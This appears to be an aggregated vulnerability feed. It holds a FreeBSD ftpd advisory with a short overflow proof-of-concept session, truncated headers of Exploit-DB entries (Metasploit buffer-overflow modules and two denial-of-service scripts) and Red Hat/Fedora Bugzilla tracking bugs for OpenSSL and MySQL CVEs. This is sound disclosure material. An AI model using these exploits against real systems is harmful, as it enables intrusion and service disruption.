# http://securityreason.com/achievement_securityalert/87
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#
PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.
- --
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksy
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0067 HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)
---
##
# $Id: hp_nnm_toolbar.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Vers
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0955 Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: creative_software_cachefolder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When
sending an overly long string to the cachefolder() property of CTSUEng.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-4384 iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: lpviewer_url.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When
sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
Exploit-DB
Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-1365 Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_officescan.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'metasm'
class Metasploit3 'Trend Micro OfficeScan Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Trend Micro OfficeScan
cgiChkMasterPwd.exe (running with SYSTEM privileges).
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-1365' ],
[ 'OSVDB', '
Exploit-DB
Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)
exploitdb·2010-05-09
CVE-2008-3008 Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)
---
##
# $Id: ms08_053_mediaencoder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Windows Media Encoder 9. When
sending an overly long string to the GetDetailsString() method of wmex.dll
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC
Exploit-DB
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
exploitdb·2010-04-30
CVE-2008-0015 Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
---
##
# $Id: msvidctl_mpeg2.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# msvidctl_mpeg2.rb
#
# Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit for the Metasploit Framework
#
# Tested successfully on the following platforms (fully patched 06/07/09):
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
#
# Original exploit was found in-the-wild used to perform drive-by attacks via compromised C
Exploit-DB
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
exploitdb·2009-01-01
CVE-2008-5821 Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
---
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, resulting in a denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_
Exploit-DB
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
exploitdb·2008-07-31
CVE-2010-0437 Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
---
/*
source: https://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
*/
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
/*****************************************************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice
Bugzilla
CVE-2008-7270 openssl: NETSCAPE_REUSE_CIPHER_CHANGE_BUG downgrade-to-disabled ciphersuite attack
bugzilla·2010-12-07·CVSS 4.3
CVE-2008-7270 [MEDIUM] CVE-2008-7270 openssl: NETSCAPE_REUSE_CIPHER_CHANGE_BUG downgrade-to-disabled ciphersuite attack
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-7270 to
the following vulnerability:
OpenSSL before 0.9.8j, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of a disabled cipher via vectors involving sniffing network traffic to discover a session identifier, a different vulnerability than CVE-2010-4180.
References:
http://cvs.openssl.org/chngview?cn=17489
https://bugzilla.redhat.com/show_bug.cgi?id=659462
Discussion:
(In reply to comment #0)
> a different vulnerability than CVE-2010-4180.
While CVE description lists these vulnerabilities as dif
Bugzilla
CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE [fedora-all]
bugzilla·2010-07-13·CVSS 3.5
CVE-2010-2008 [LOW] CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=614214
Please note: this issue affects multi
Bugzilla
CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE
bugzilla·2010-07-13·CVSS 3.5
CVE-2010-2008 [LOW] CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2008 to
the following vulnerability:
Name: CVE-2010-2008
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2008
Assigned: 20100521
Reference: CONFIRM: http://bugs.mysql.com/bug.php?id=53804
Reference: CONFIRM: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html
Reference: BID:41198
Reference: URL: http://www.securityfocus.com/bid/41198
Reference: SECTRACK:1024160
Reference: URL: http://www.securitytracker.com/id?1024160
Reference: SECUNIA:40333
Reference: URL: http://secunia.com/advisories/40333
MySQL before 5.1.48 allows remote authenticated users with alter
database privileges to cause a denial of service (server crash and
database loss) v
Bugzilla
CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
bugzilla·2009-02-09·CVSS 7.1
CVE-2008-4437 [HIGH] CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
F10 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=484756,
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&bugs=484756,CVE-2008-6098,CVE-2009-0481,CVE-2009-0482,CVE-2009-0483,CVE-2009-0484,CVE-2009-0485,CVE-2009-0486
---
*** Bug 465959 has been marked as a duplicate of this bug. ***
---
CVE-2008-4437 fixed in upstream 3.0.5 is still unfixed too, adding it to this tracking bug
http://bugs.mysql.com/bug.php?id=53804
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html
http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044546.html
http://secunia.com/advisories/40333
http://secunia.com/advisories/40762
http://www.mandriva.com/security/advisories?name=MDVSA-2010:155
http://www.securityfocus.com/bid/41198
http://www.securitytracker.com/id?1024160
http://www.ubuntu.com/usn/USN-1017-1
http://www.ubuntu.com/usn/USN-1397-1
http://www.vupen.com/english/advisories/2010/1918
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11869
Published: 2010-07-13